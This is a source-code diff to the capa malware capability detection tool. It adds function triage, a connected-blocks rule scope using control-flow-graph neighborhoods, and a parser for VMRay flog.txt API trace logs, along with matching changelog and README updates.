diff --git a/CHANGELOG.md b/CHANGELOG.md index 3169082671..2a5da92c2e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,7 +5,12 @@ ### New Features - ghidra: support PyGhidra @mike-hunhoff #2788 +- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 +- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 +- static: add function triage stage (skip/deprioritize/analyze logging) before function matching; library skip reporting unchanged +- static rules: add `connected blocks` scope/subscope with fixed depth=2 CFG neighborhoods and Vivisect CFG-edge support +- scripts: add `scripts/demo_connected_blocks_and_triage.py` to show triage counts and connected-block rule syntax ### Breaking Changes diff --git a/README.md b/README.md index 8a0fc9e9a3..890e4c6ab5 100644 --- a/README.md +++ b/README.md @@ -89,6 +89,22 @@ To use capa as a library or integrate with another tool, see [doc/installation.m **Documentation:** [Usage and tips](doc/usage.md) · [Installation](doc/installation.md) · [Limitations](doc/limitations.md) · [FAQ](doc/faq.md) +## static pipeline triage and connected blocks + +Recent static pipeline updates add: + +- **function triage** before full function matching: functions may be conservatively marked as skip/deprioritize using lightweight signals (library/flirt state, function size, API presence when available, thunk/runtime naming patterns). +- **connected blocks** static subscope syntax: + +```yaml +- connected blocks: + - and: + - api: kernel32.CreateFileA + - api: kernel32.WriteFile +``` + +Connected-block matching currently uses fixed CFG neighborhood depth `2` and is available when using a backend with CFG edge support (Vivisect). Other static backends return no CFG edges for this scope. + # capa Explorer Web The [capa Explorer Web](https://mandiant.github.io/capa/explorer/) enables you to interactively explore capa results in your web browser. Besides the online version you can download a standalone HTML file for local offline usage. diff --git a/capa/capabilities/static.py b/capa/capabilities/static.py index d485aa48c7..d97a7c8270 100644 --- a/capa/capabilities/static.py +++ b/capa/capabilities/static.py @@ -18,14 +18,17 @@ import itertools import collections from dataclasses import dataclass +from collections import deque import capa.perf import capa.helpers +import capa.engine import capa.features.freeze as frz import capa.render.result_document as rdoc from capa.rules import Scope, RuleSet from capa.engine import FeatureSet, MatchResults from capa.capabilities.common import Capabilities, find_file_capabilities +from capa.capabilities.triage import TriageDecision, classify_function, classify_library_function from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, StaticFeatureExtractor logger = logging.getLogger(__name__) @@ -110,11 +113,47 @@ def find_basic_block_capabilities( @dataclass class CodeCapabilities: function_matches: MatchResults + connected_block_matches: MatchResults basic_block_matches: MatchResults instruction_matches: MatchResults feature_count: int +def _build_connected_block_adjacency( + extractor: StaticFeatureExtractor, fh: FunctionHandle, bbs: tuple[BBHandle, ...] +) -> dict: + adjacency = fh.ctx.get("connected_blocks_adjacency") + if adjacency is not None: + return adjacency + + adjacency = collections.defaultdict(set) + bb_by_address = {bb.address: bb for bb in bbs} + for bb in bbs: + adjacency[bb.address] + for succ in extractor.get_cfg_edges(fh, bb): + if succ.address in bb_by_address: + adjacency[bb.address].add(succ.address) + adjacency[succ.address].add(bb.address) + + fh.ctx["connected_blocks_adjacency"] = adjacency + return adjacency + + +def _collect_connected_neighborhood(adjacency: dict, seed, depth: int = 2) -> set: + seen = {seed} + q = deque([(seed, 0)]) + while q: + node, d = q.popleft() + if d >= depth: + continue + for succ in adjacency.get(node, ()): + if succ in seen: + continue + seen.add(succ) + q.append((succ, d + 1)) + return seen + + def find_code_capabilities(ruleset: RuleSet, extractor: StaticFeatureExtractor, fh: FunctionHandle) -> CodeCapabilities: """ find matches for the given rules within the given function. @@ -126,33 +165,66 @@ def find_code_capabilities(ruleset: RuleSet, extractor: StaticFeatureExtractor, # matches found at the basic block scope. # might be found at different basic blocks, that's ok. bb_matches: MatchResults = collections.defaultdict(list) + connected_block_matches: MatchResults = collections.defaultdict(list) # matches found at the instruction scope. # might be found at different instructions, that's ok. insn_matches: MatchResults = collections.defaultdict(list) - for bb in extractor.get_basic_blocks(fh): - basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) - for feature, vas in basic_block_capabilities.features.items(): - function_features[feature].update(vas) - - for rule_name, res in basic_block_capabilities.basic_block_matches.items(): - bb_matches[rule_name].extend(res) - - for rule_name, res in basic_block_capabilities.instruction_matches.items(): - insn_matches[rule_name].extend(res) + has_connected_block_rules = bool(ruleset.connected_block_rules) + if has_connected_block_rules: + bbs = tuple(extractor.get_basic_blocks(fh)) + bb_features_by_address: dict = {} + for bb in bbs: + basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) + bb_features_by_address[bb.address] = basic_block_capabilities.features + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) + + adjacency = _build_connected_block_adjacency(extractor, fh, bbs) + for seed in bbs: + neighborhood = _collect_connected_neighborhood(adjacency, seed.address, depth=2) + neighborhood_features: FeatureSet = collections.defaultdict(set) + for bb_address in neighborhood: + for feature, vas in bb_features_by_address.get(bb_address, {}).items(): + neighborhood_features[feature].update(vas) + + _, matches = ruleset.match(Scope.CONNECTED_BLOCKS, neighborhood_features, seed.address) + for rule_name, res in matches.items(): + connected_block_matches[rule_name].extend(res) + rule = ruleset[rule_name] + for va, _ in res: + capa.engine.index_rule_matches(function_features, rule, [va]) + else: + for bb in extractor.get_basic_blocks(fh): + basic_block_capabilities = find_basic_block_capabilities(ruleset, extractor, fh, bb) + for feature, vas in basic_block_capabilities.features.items(): + function_features[feature].update(vas) + + for rule_name, res in basic_block_capabilities.basic_block_matches.items(): + bb_matches[rule_name].extend(res) + + for rule_name, res in basic_block_capabilities.instruction_matches.items(): + insn_matches[rule_name].extend(res) for feature, va in itertools.chain(extractor.extract_function_features(fh), extractor.extract_global_features()): function_features[feature].add(va) _, function_matches = ruleset.match(Scope.FUNCTION, function_features, fh.address) - return CodeCapabilities(function_matches, bb_matches, insn_matches, len(function_features)) + return CodeCapabilities(function_matches, connected_block_matches, bb_matches, insn_matches, len(function_features)) def find_static_capabilities( ruleset: RuleSet, extractor: StaticFeatureExtractor, disable_progress=None ) -> Capabilities: all_function_matches: MatchResults = collections.defaultdict(list) + all_connected_block_matches: MatchResults = collections.defaultdict(list) all_bb_matches: MatchResults = collections.defaultdict(list) all_insn_matches: MatchResults = collections.defaultdict(list) @@ -163,6 +235,7 @@ def find_static_capabilities( functions: list[FunctionHandle] = list(extractor.get_functions()) n_funcs: int = len(functions) n_libs: int = 0 + triage_counts: collections.Counter = collections.Counter() percentage: float = 0 with capa.helpers.CapaProgressBar( @@ -171,7 +244,27 @@ def find_static_capabilities( task = pbar.add_task( "matching", total=n_funcs, unit="functions", postfix=f"skipped {n_libs} library functions, {percentage}%" ) + triage_results: dict = {} + prioritized_functions: list[FunctionHandle] = [] + deprioritized_functions: list[FunctionHandle] = [] + skipped_functions: list[FunctionHandle] = [] for f in functions: + if extractor.is_library_function(f.address): + triage_counts[TriageDecision.SKIP.value] += 1 + classify_library_function(f) + prioritized_functions.append(f) + continue + triage = classify_function(extractor, f) + triage_results[f.address] = triage + triage_counts[triage.decision.value] += 1 + if triage.decision == TriageDecision.SKIP: + skipped_functions.append(f) + elif triage.decision == TriageDecision.DEPRIORITIZE: + deprioritized_functions.append(f) + else: + prioritized_functions.append(f) + + for f in itertools.chain(prioritized_functions, deprioritized_functions, skipped_functions): t0 = time.time() if extractor.is_library_function(f.address): function_name = extractor.get_function_name(f.address) @@ -185,6 +278,12 @@ def find_static_capabilities( pbar.advance(task) continue + triage = triage_results[f.address] + if triage.decision == TriageDecision.SKIP: + logger.debug("skipping triaged function %s (%s)", f.address, triage.reason) + pbar.advance(task) + continue + code_capabilities = find_code_capabilities(ruleset, extractor, f) feature_counts.functions += ( rdoc.FunctionFeatureCount( @@ -196,6 +295,7 @@ def find_static_capabilities( match_count = 0 for name, matches_ in itertools.chain( code_capabilities.function_matches.items(), + code_capabilities.connected_block_matches.items(), code_capabilities.basic_block_matches.items(), code_capabilities.instruction_matches.items(), ): @@ -212,6 +312,8 @@ def find_static_capabilities( for rule_name, res in code_capabilities.function_matches.items(): all_function_matches[rule_name].extend(res) + for rule_name, res in code_capabilities.connected_block_matches.items(): + all_connected_block_matches[rule_name].extend(res) for rule_name, res in code_capabilities.basic_block_matches.items(): all_bb_matches[rule_name].extend(res) for rule_name, res in code_capabilities.instruction_matches.items(): @@ -219,11 +321,22 @@ def find_static_capabilities( pbar.advance(task) + logger.debug( + "function triage summary: analyze=%d deprioritize=%d skip=%d (library=%d)", + triage_counts[TriageDecision.ANALYZE.value], + triage_counts[TriageDecision.DEPRIORITIZE.value], + triage_counts[TriageDecision.SKIP.value] - n_libs, + n_libs, + ) + # collection of features that captures the rule matches within function, BB, and instruction scopes. # mapping from feature (matched rule) to set of addresses at which it matched. function_and_lower_features: FeatureSet = collections.defaultdict(set) for rule_name, results in itertools.chain( - all_function_matches.items(), all_bb_matches.items(), all_insn_matches.items() + all_function_matches.items(), + all_connected_block_matches.items(), + all_bb_matches.items(), + all_insn_matches.items(), ): locations = {p[0] for p in results} rule = ruleset[rule_name] @@ -239,6 +352,7 @@ def find_static_capabilities( # and we can merge the dictionaries naively. all_insn_matches.items(), all_bb_matches.items(), + all_connected_block_matches.items(), all_function_matches.items(), all_file_capabilities.matches.items(), ) diff --git a/capa/capabilities/triage.py b/capa/capabilities/triage.py new file mode 100644 index 0000000000..b016b2d894 --- /dev/null +++ b/capa/capabilities/triage.py @@ -0,0 +1,202 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import logging +from enum import Enum +from dataclasses import dataclass + +import capa.features.insn +from capa.features.extractors.base_extractor import FunctionHandle, StaticFeatureExtractor + +logger = logging.getLogger(__name__) + + +REASON_DEFAULT = "analyze" +REASON_LIBRARY = "library/flirt function" +REASON_CRT_NAME = "crt/runtime function name pattern" +REASON_TINY_NO_API = "tiny function without API evidence" +REASON_THUNK = "thunk-like function" +REASON_RUNTIME_SECTION = "runtime section pattern" +REASON_LARGE_COMPLEXITY = "large function complexity" + +CRT_NAME_PREFIXES = ( + "__security_", + "__scrt_", + "__acrt_", + "__vcrt_", + "__chkstk", + "_chkstk", + "__gshandler", + "__cxx", + "_cxx", + "__initterm", + "_initterm", + "__crt", + "__imp_", + "_imp__", +) + +RUNTIME_SECTION_NAMES = { + ".init", + ".fini", + ".init_array", + ".fini_array", + ".ctors", + ".dtors", + ".plt", + ".plt.got", + ".plt.sec", +} + + +class TriageDecision(str, Enum): + ANALYZE = "analyze" + SKIP = "skip" + DEPRIORITIZE = "deprioritize" + + +@dataclass(frozen=True) +class TriageResult: + decision: TriageDecision + reason: str = REASON_DEFAULT + + +def _looks_like_runtime_name(name: str) -> bool: + lname = name.lower() + return lname.startswith(CRT_NAME_PREFIXES) or lname.startswith("j_") or lname.startswith("nullsub_") + + +def _get_function_name(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> str: + try: + return extractor.get_function_name(fh.address) + except KeyError: + return "" + + +def _get_section_name(fh: FunctionHandle) -> str: + inner = fh.inner + if inner is None: + return "" + section = getattr(inner, "section_name", "") + if isinstance(section, str): + return section + vw = getattr(inner, "vw", None) + va = getattr(inner, "va", None) + if vw is None or va is None: + return "" + for seg_va, seg_size, seg_name, _ in vw.getSegments(): + if seg_va <= va < seg_va + seg_size: + return seg_name + return "" + + +def _collect_size_and_signals(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> tuple[int, int, bool, bool]: + bb_count = 0 + insn_count = 0 + has_api = False + is_thunk_candidate = False + + for bbh in extractor.get_basic_blocks(fh): + bb_count += 1 + instructions = list(extractor.get_instructions(fh, bbh)) + insn_count += len(instructions) + + if bb_count == 1 and 0 < len(instructions) <= 3: + last = instructions[-1].inner + mnem = getattr(last, "mnem", "") + if mnem in ("jmp", "ret"): + is_thunk_candidate = True + + for ih in instructions: + mnem = getattr(ih.inner, "mnem", "") + if isinstance(mnem, str) and mnem.lower().startswith("call"): + has_api = True + break + if has_api and bb_count > 1: + # for triage we only need API presence, not full counting. + continue + + is_thunk = bb_count == 1 and is_thunk_candidate + return bb_count, insn_count, has_api, is_thunk + + +def _has_api_feature_evidence(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> bool: + """ + confirm API evidence using extracted instruction features. + this avoids false negatives from mnemonic-only call heuristics. + """ + for bbh in extractor.get_basic_blocks(fh): + for ih in extractor.get_instructions(fh, bbh): + for feature, _ in extractor.extract_insn_features(fh, bbh, ih): + if isinstance(feature, capa.features.insn.API): + return True + return False + + +def classify_function(extractor: StaticFeatureExtractor, fh: FunctionHandle) -> TriageResult: + if fh.inner is None: + result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT) + logger.debug( + "function triage: address=%s decision=%s reason=%s (no function context)", + fh.address, + result.decision.value, + result.reason, + ) + return result + + name = _get_function_name(extractor, fh) + section_name = _get_section_name(fh).lower() + bb_count, insn_count, has_api, is_thunk = _collect_size_and_signals(extractor, fh) + + if not has_api and (is_thunk or section_name in RUNTIME_SECTION_NAMES or (name and bb_count <= 1 and insn_count <= 4)): + has_api = _has_api_feature_evidence(extractor, fh) + + if name and _looks_like_runtime_name(name): + result = TriageResult(TriageDecision.SKIP, REASON_CRT_NAME) + elif is_thunk and not has_api: + result = TriageResult(TriageDecision.SKIP, REASON_THUNK) + elif section_name in RUNTIME_SECTION_NAMES and not has_api and insn_count <= 8: + result = TriageResult(TriageDecision.SKIP, REASON_RUNTIME_SECTION) + elif name and not has_api and bb_count <= 1 and insn_count <= 4: + # conservative skip: only very small/no-API helpers. + result = TriageResult(TriageDecision.SKIP, REASON_TINY_NO_API) + elif bb_count >= 512 or insn_count >= 4096: + result = TriageResult(TriageDecision.DEPRIORITIZE, REASON_LARGE_COMPLEXITY) + else: + result = TriageResult(TriageDecision.ANALYZE, REASON_DEFAULT) + + logger.debug( + "function triage: address=%s decision=%s reason=%s bb=%d insn=%d has_api=%s thunk=%s section=%s name=%s", + fh.address, + result.decision.value, + result.reason, + bb_count, + insn_count, + has_api, + is_thunk, + section_name, + name, + ) + return result + + +def classify_library_function(fh: FunctionHandle) -> TriageResult: + result = TriageResult(TriageDecision.SKIP, REASON_LIBRARY) + logger.debug( + "function triage: address=%s decision=%s reason=%s", + fh.address, + result.decision.value, + result.reason, + ) + return result diff --git a/capa/features/extractors/base_extractor.py b/capa/features/extractors/base_extractor.py index 1be52d06b0..fb8f50e424 100644 --- a/capa/features/extractors/base_extractor.py +++ b/capa/features/extractors/base_extractor.py @@ -265,6 +265,14 @@ def extract_basic_block_features(self, f: FunctionHandle, bb: BBHandle) -> Itera """ raise NotImplementedError() + def get_cfg_edges(self, f: FunctionHandle, bb: BBHandle) -> Iterator[BBHandle]: + """ + enumerate successor basic blocks in the control-flow graph for a given basic block. + + backends without CFG support may yield nothing. + """ + yield from () + @abc.abstractmethod def get_instructions(self, f: FunctionHandle, bb: BBHandle) -> Iterator[InsnHandle]: """ diff --git a/capa/features/extractors/viv/extractor.py b/capa/features/extractors/viv/extractor.py index 99d60e4a80..3882b69e89 100644 --- a/capa/features/extractors/viv/extractor.py +++ b/capa/features/extractors/viv/extractor.py @@ -16,6 +16,7 @@ from typing import Any, Iterator from pathlib import Path +import envi import viv_utils import viv_utils.flirt @@ -84,6 +85,27 @@ def get_instructions(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[InsnHa for insn in bb.instructions: yield InsnHandle(address=AbsoluteVirtualAddress(insn.va), inner=insn) + def get_cfg_edges(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[BBHandle]: + f: viv_utils.Function = fh.inner + bb: viv_utils.BasicBlock = bbh.inner + + bb_by_va = {b.va: b for b in f.basic_blocks} + if len(bb.instructions) == 0: + return + + last_insn = bb.instructions[-1] + for bva, bflags in last_insn.getBranches(): + if bva is None: + continue + + if ( + bflags & envi.BR_COND + or bflags & envi.BR_FALL + or bflags & envi.BR_TABLE + or last_insn.mnem == "jmp" + ) and bva in bb_by_va: + yield BBHandle(address=AbsoluteVirtualAddress(bva), inner=bb_by_va[bva]) + def extract_insn_features( self, fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle ) -> Iterator[tuple[Feature, Address]]: diff --git a/capa/features/extractors/vmray/__init__.py b/capa/features/extractors/vmray/__init__.py index 0eaf0d4c22..a27b9ae1b6 100644 --- a/capa/features/extractors/vmray/__init__.py +++ b/capa/features/extractors/vmray/__init__.py @@ -20,13 +20,23 @@ from dataclasses import dataclass from capa.exceptions import UnsupportedFormatError -from capa.features.extractors.vmray.models import File, Flog, SummaryV2, StaticData, FunctionCall, xml_to_dict +from capa.features.extractors.vmray.models import ( + AnalysisMetadata, + File, + FileHashes, + Flog, + FunctionCall, + StaticData, + SummaryV2, + xml_to_dict, +) +from capa.features.extractors.vmray import flog_txt logger = logging.getLogger(__name__) DEFAULT_ARCHIVE_PASSWORD = b"infected" -SUPPORTED_FLOG_VERSIONS = ("2",) +SUPPORTED_FLOG_VERSIONS = ("1", "2") # "1" = flog.txt, "2" = flog.xml @dataclass @@ -132,6 +142,49 @@ def __init__(self, zipfile_path: Path): self._compute_monitor_threads() self._compute_monitor_process_calls() + @classmethod + def from_flog_txt(cls, flog_txt_path: Path) -> "VMRayAnalysis": + """ + Build VMRayAnalysis from a standalone flog.txt file (no ZIP). + Used when only the free "Download Function Log" from VMRay is available. + No submission file or static data; only API trace is available. + """ + self = cls.__new__(cls) + self.zipfile = None + self.flog = flog_txt.parse_flog_txt_path(flog_txt_path) + if self.flog.analysis.log_version not in SUPPORTED_FLOG_VERSIONS: + raise UnsupportedFormatError( + "VMRay feature extractor does not support flog version %s" % self.flog.analysis.log_version + ) + self.sv2 = SummaryV2( + analysis_metadata=AnalysisMetadata( + sample_type="unknown", + submission_filename=flog_txt_path.name, + ), + ) + self.submission_type = "unknown" + self.submission_name = flog_txt_path.name + self.submission_meta = File( + hash_values=FileHashes(md5="0" * 32, sha1="0" * 40, sha256="0" * 64), + is_sample=True, + ref_static_data=None, + ) + self.submission_sha256 = None + self.submission_static = None + self.submission_bytes = b"" + self.submission_base_address = None + self.exports = {} + self.imports = {} + self.sections = {} + self.monitor_processes = {} + self.monitor_threads = {} + self.monitor_threads_by_monitor_process = defaultdict(list) + self.monitor_process_calls = defaultdict(lambda: defaultdict(list)) + self._compute_monitor_processes() + self._compute_monitor_threads() + self._compute_monitor_process_calls() + return self + def _find_sample_file(self): logger.debug("searching archive for submission") diff --git a/capa/features/extractors/vmray/extractor.py b/capa/features/extractors/vmray/extractor.py index 27eeed4819..021eb33dc7 100644 --- a/capa/features/extractors/vmray/extractor.py +++ b/capa/features/extractors/vmray/extractor.py @@ -150,3 +150,8 @@ def get_call_name(self, ph, th, ch) -> str: @classmethod def from_zipfile(cls, zipfile_path: Path): return cls(VMRayAnalysis(zipfile_path)) + + @classmethod + def from_flog_txt(cls, flog_txt_path: Path): + """Build extractor from a standalone VMRay flog.txt (no ZIP). See #2452.""" + return cls(VMRayAnalysis.from_flog_txt(flog_txt_path)) diff --git a/capa/features/extractors/vmray/flog_txt.py b/capa/features/extractors/vmray/flog_txt.py new file mode 100644 index 0000000000..fd341b9587 --- /dev/null +++ b/capa/features/extractors/vmray/flog_txt.py @@ -0,0 +1,284 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Parser for VMRay Function Log text format (flog.txt). + +flog.txt is a free download from VMRay (Threat Feed -> Full Report -> Download Function Log). +Format: header lines starting with "#", then Process: blocks containing Region: and Thread: +blocks. Thread blocks contain API trace lines like: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + +See: https://github.com/mandiant/capa/issues/2452 +""" + +import re +from pathlib import Path +from typing import Any, Optional + +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray.models import ( + Analysis, + Flog, + FunctionCall, + MonitorProcess, + MonitorThread, + Param, + Params, +) + +FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1" + +# Matches name=value argument pairs inside an API call's parentheses. +# value may be: "quoted string" (including escaped chars), 0xHEX, decimal, or other token. +_PARAM_RE = re.compile(r'(\w+)=((?:"(?:[^"\\]|\\.)*")|(?:0x[0-9a-fA-F]+)|(?:\d+)|(?:[^,\s]+))') + + +def _parse_hex_or_decimal(s: str) -> int: + s = s.strip().strip('"') + if not s: + return 0 + if s.lower().startswith("0x"): + return int(s, 16) + return int(s, 10) + + +def _parse_properties(block: str) -> dict[str, Any]: + """Parse key = value lines from a Process/Thread/Region block.""" + result: dict[str, Any] = {} + for line in block.splitlines(): + line = line.strip() + if not line or " = " not in line: + continue + key, _, value = line.partition(" = ") + key = key.strip() + value = value.strip() + if key in ("os_pid", "os_parent_pid", "parent_id", "process_id", "thread_id", "os_tid", "id"): + result[key] = _parse_hex_or_decimal(value) + elif key in ("filename", "image_name", "cmd_line", "monitor_reason"): + result[key] = value.strip('"').replace("\\\\", "\\").strip() + else: + result[key] = value + return result + + +def _parse_args(args_str: str) -> Optional[Params]: + """ + Parse an API call's argument string into a Params object. + + Handles: name="quoted string", name=0xHEX, name=DECIMAL. + String values are modelled as void_ptr + str deref to match the XML extractor convention + so that String features are correctly yielded by the call feature extractor. + Numeric values use type unsigned_32bit so that Number features are yielded. + Symbolic constants (e.g. NULL, TRUE) are skipped; their numeric values are unknown without + header definitions. + + Returns None if no parseable arguments are present. + """ + if not args_str.strip(): + return None + params: list[Param] = [] + for m in _PARAM_RE.finditer(args_str): + name = m.group(1) + raw = m.group(2) + if raw.startswith('"'): + # String value — model as void_ptr with str deref (matches XML extractor convention) + str_val = raw[1:-1] + params.append( + Param.model_validate({"name": name, "type": "void_ptr", "deref": {"type": "str", "value": str_val}}) + ) + elif re.match(r"^0x[0-9a-fA-F]+$", raw) or raw.isdigit(): + # Numeric value — model as integer so Number features are yielded + params.append(Param.model_validate({"name": name, "type": "unsigned_32bit", "value": raw})) + # else: symbolic constant (NULL, INVALID_HANDLE_VALUE, etc.) — skip; value not recoverable + if not params: + return None + return Params.model_validate({"param": params}) + + +def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: + """ + Parse one API trace line. Returns (api_name, args_str, return_value) or None. + Examples: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0083.567] CoTaskMemFree (pv=0x746aa0) + """ + line = line.strip() + if not line.startswith("["): + return None + # [timestamp] api_name (args) [returned rv] + match = re.match(r"\[\s*(\d+)\.(\d+)\]\s+(\S+)\s*\((.*)\)\s*(?:returned\s+(0x[0-9a-fA-F]+|\d+))?", line) + if not match: + return None + _major, _minor, api_name, args, rv = match.groups() + args = args.strip() if args else "" + return_value: Optional[int] = None + if rv: + return_value = _parse_hex_or_decimal(rv) + return (api_name, args, return_value) + + +def _parse_thread_block( + block: str, thread_props: dict[str, Any] +) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]: + """Parse a Thread: block; return MonitorThread and collect events (caller adds them).""" + lines = block.splitlines() + events: list[tuple[str, str, Optional[int]]] = [] + for line in lines: + if line.strip().startswith("["): + ev = _parse_event(line) + if ev: + events.append(ev) + thread_id = thread_props.get("thread_id") or thread_props.get("id") + os_tid = thread_props.get("os_tid", 0) + process_id = thread_props.get("process_id", 0) + if thread_id is None: + return None + # We return the MonitorThread; events are converted to FunctionCalls by the caller + return MonitorThread( + ts=0, + thread_id=int(thread_id), + process_id=int(process_id), + os_tid=int(os_tid) if os_tid else 0, + ), events + + +def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[MonitorThread], list[FunctionCall]]]: + """ + Parse a Process: block. Returns (MonitorProcess, list of MonitorThread, list of FunctionCall) or None. + """ + # Split by Thread: on its own line (allow optional whitespace) + parts = re.split(r"\n\s*Thread:\s*\n", block) + if len(parts) < 2: + return None # no Thread: block found + header_and_regions = parts[0] + thread_blocks = [p.strip() for p in parts[1:] if p.strip()] + + # First part: Process properties then Region: blocks (use regex for robustness) + process_props = _parse_properties(re.split(r"\n\s*Region:\s*\n", header_and_regions)[0]) + process_id = process_props.get("id") or process_props.get("process_id") + if process_id is None: + return None + monitor_process = MonitorProcess( + ts=0, + process_id=int(process_id), + image_name=process_props.get("image_name", "").strip('"') or "unknown", + filename=process_props.get("filename", "").strip('"') or "", + os_pid=process_props.get("os_pid", 0) or 0, + monitor_reason=process_props.get("monitor_reason", "analysis_target").strip('"'), + parent_id=int(process_props.get("parent_id", 0) or 0), + os_parent_pid=int(process_props.get("os_parent_pid", 0) or 0), + cmd_line=process_props.get("cmd_line", "").strip('"') or "", + ) + + threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + fncall_id = 0 + for thread_block in thread_blocks: + thread_props = _parse_properties(thread_block) + thread_props["process_id"] = process_id + parsed = _parse_thread_block(thread_block, thread_props) + if parsed is None: + continue + mon_thread, events = parsed + threads.append(mon_thread) + for api_name, args_str, rv in events: + fncall_id += 1 + # Strip sys_ prefix for Linux kernel calls (match XML behavior) + if api_name.startswith("sys_"): + api_name = api_name[4:] + # use model_validate because FunctionCall's "in" alias clashes with a Python keyword; + # passing params_in= via __init__ is silently dropped by Pydantic + function_calls.append( + FunctionCall.model_validate( + { + "fncall_id": fncall_id, + "process_id": mon_thread.process_id, + "thread_id": mon_thread.thread_id, + "name": api_name, + "in": _parse_args(args_str), + "out": None, + } + ) + ) + + return (monitor_process, threads, function_calls) + + +def parse_flog_txt(content: str) -> Flog: + """ + Parse flog.txt content into the same Flog (Analysis) model used by the XML path. + """ + # Skip BOM if present; normalize line endings so splits on "Process:\n" / "Thread:\n" work + if content.startswith("\ufeff"): + content = content[1:] + content = content.replace("\r\n", "\n").replace("\r", "\n") + lines = content.splitlines() + # Find end of header (first non-# line) + header_end: Optional[int] = None + for i, line in enumerate(lines): + if line.strip() and not line.strip().startswith("#"): + header_end = i + break + if header_end is None: + header_end = len(lines) + header = "\n".join(lines[:header_end]) + if FLOG_TXT_VERSION_HEADER not in header: + raise UnsupportedFormatError( + "File does not appear to be a VMRay flog.txt (missing '%s')" % FLOG_TXT_VERSION_HEADER + ) + body = "\n".join(lines[header_end:]).strip() + + # Split by "Process:" on its own line (allow optional whitespace) + process_blocks = re.split(r"\n\s*Process:\s*\n", body) + process_blocks = [b.strip() for b in process_blocks if b.strip()] + # If body started with "Process:\n", first element is the only block and starts with "Process:\n" + if not process_blocks and body.strip(): + # No split happened (e.g. body is "Process:\nid=..."), treat whole body as one process block + process_blocks = [body.strip()] + monitor_processes: list[MonitorProcess] = [] + monitor_threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + + for block in process_blocks: + # First block may start with "Process:\n" when body began with that line + if block.lstrip().startswith("Process:"): + block = block.split("\n", 1)[-1].strip() if "\n" in block else "" + if not block: + continue + result = _parse_process_block(block) + if result is None: + continue # skip malformed process block + mon_process, threads, calls = result + monitor_processes.append(mon_process) + monitor_threads.extend(threads) + function_calls.extend(calls) + + # Use alias names so Pydantic accepts the lists (Analysis model uses alias= for XML compat) + analysis = Analysis( + log_version="1", + analyzer_version="flog.txt", + monitor_process=monitor_processes, + monitor_thread=monitor_threads, + fncall=function_calls, + ) + return Flog(analysis=analysis) + + +def parse_flog_txt_path(path: Path) -> Flog: + """Parse a flog.txt file from disk.""" + text = path.read_text(encoding="utf-8", errors="replace") + return parse_flog_txt(text) diff --git a/capa/helpers.py b/capa/helpers.py index 27c757dcc6..ddda8acb54 100644 --- a/capa/helpers.py +++ b/capa/helpers.py @@ -231,6 +231,14 @@ def get_format_from_extension(sample: Path) -> str: format_ = FORMAT_SC32 elif sample.name.endswith(EXTENSIONS_SHELLCODE_64): format_ = FORMAT_SC64 + elif sample.name.endswith("flog.txt"): + # VMRay free "Download Function Log" format (#2452) + try: + header = sample.read_bytes()[:512].decode("utf-8", errors="replace") + if "# Flog Txt Version 1" in header: + format_ = FORMAT_VMRAY + except (OSError, UnicodeDecodeError): + pass elif sample.name.endswith(EXTENSIONS_DYNAMIC): format_ = get_format_from_report(sample) elif sample.name.endswith(EXTENSIONS_FREEZE): @@ -307,9 +315,10 @@ def log_unsupported_vmray_report_error(error: str): logger.error(" Input file is not a valid VMRay analysis archive: %s", error) logger.error(" ") logger.error( - " capa only supports analyzing VMRay dynamic analysis archives containing summary_v2.json and flog.xml log files." + " capa supports analyzing VMRay dynamic analysis archives (containing summary_v2.json and flog.xml)" ) - logger.error(" Please make sure you have downloaded a dynamic analysis archive from VMRay.") + logger.error(" or a standalone VMRay function log (flog.txt, via Threat Feed -> Full Report -> Download Function Log).") + logger.error(" Please make sure you have downloaded a supported VMRay report.") logger.error("-" * 80) diff --git a/capa/ida/plugin/cache.py b/capa/ida/plugin/cache.py index d7cbfd10ac..9b019e25bd 100644 